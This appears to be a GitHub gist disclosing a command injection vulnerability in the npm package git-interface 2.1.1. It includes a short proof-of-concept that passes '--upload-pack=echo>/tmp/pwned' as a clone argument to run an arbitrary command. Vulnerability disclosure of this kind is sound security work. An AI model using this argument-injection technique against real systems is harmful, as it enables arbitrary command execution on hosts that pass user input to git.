Skip to content

Instantly share code, notes, and snippets.

@lirantal

lirantal/git-interface-command-injection.md Secret

Created April 16, 2022 10:28
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save lirantal/972eba057d4b60bd1656d68b40899eab to your computer and use it in GitHub Desktop.
Save lirantal/972eba057d4b60bd1656d68b40899eab to your computer and use it in GitHub Desktop.
Download ZIP
Command Injection vulnerability in git-interface@2.1.1
Raw
git-interface-command-injection.md

Command Injection vulnerability in git-interface@2.1.1

git-interface describes itself as a Interface to work with a git repository in node.js

Resources:

Background on exploitation

I'm reporting an OS Command Injection vulnerability in git-interface npm package. The API may be abused if user input is able to provide a valid directory on disk, and supply the destination directory to clone a repository too. If both are provided by user input, then the use of a --upload-pack command line argument feature of git is also supported for git clone, which would then allow for any operating system command to be spawned by the attacker.

Proof of Concept exploit

Install git-interface@2.1.1 which is the latest.

Run the following code, with the following precondition, in which the /tmp/new directory needs to exist (doesn't need to be a .git initialized directory though), and so, you could provide a predictable path like say /usr/src:

const { Git } = require('git-interface');

const git = new Git({
	dir: '/tmp/new' //default path is current directory
});

git.clone('file:///tmp/new', '--upload-pack=echo>/tmp/pwned');

Observe a new file created: /tmp/pwned

Author

Liran Tal

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment